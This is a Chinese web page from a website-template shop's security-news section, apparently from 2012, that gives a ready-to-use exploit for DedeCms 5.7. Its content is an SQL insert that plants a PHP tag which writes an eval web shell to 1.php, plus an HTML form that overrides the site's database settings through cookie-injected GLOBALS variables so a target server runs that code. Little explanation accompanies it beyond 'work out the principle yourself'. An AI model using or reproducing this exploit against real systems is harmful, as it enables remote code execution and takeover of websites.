您好,欢迎光临本店!  登录  免费注册
当前位置: 首页 > 站长资讯 > 网站安全 > DedeCms5.7 漏洞利用

DedeCms5.7 漏洞利用

WEB新概念建站源码超市 / 2012-02-27
[] [] []

DedeCms5.7 漏洞利用

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
 

DedeCms5.7 漏洞利用

再用下面表单提交,shell 就在同目录下  1.php。原理自己研究。。。

 

 <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />

DedeCms5.7 漏洞利用DedeCms5.7 漏洞利用DedeCms5.7 漏洞利用DedeCms5.7 漏洞利用
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

 

用户评论
暂时还没有任何用户评论
用户名: 匿名用户
E-mail:
评价等级:
评论内容:
验证码: captcha

相关商品

网店帮助

© 2005-2017 WEB新概念建站源码超市 版权所有,并保留所有权利。
广东省东莞市南城行政中心区簪花路华南建设大厦707室WEB新概念网络科技 Tel: 罗先生13480055593,黄先生15102077200 E-mail: server@webxgn.com
QQ 784159683 QQ 2267914584 MSN Messi.h2009@hotmail.com
ICP备案证书号:粤ICP备10099352号
支付宝信任商家 广东省网站信用联盟 支付宝信任商家 网络消费安全港 网警
分享到:
新概念源码超市
源码咨询:
源码咨询:
代理咨询:
代理咨询: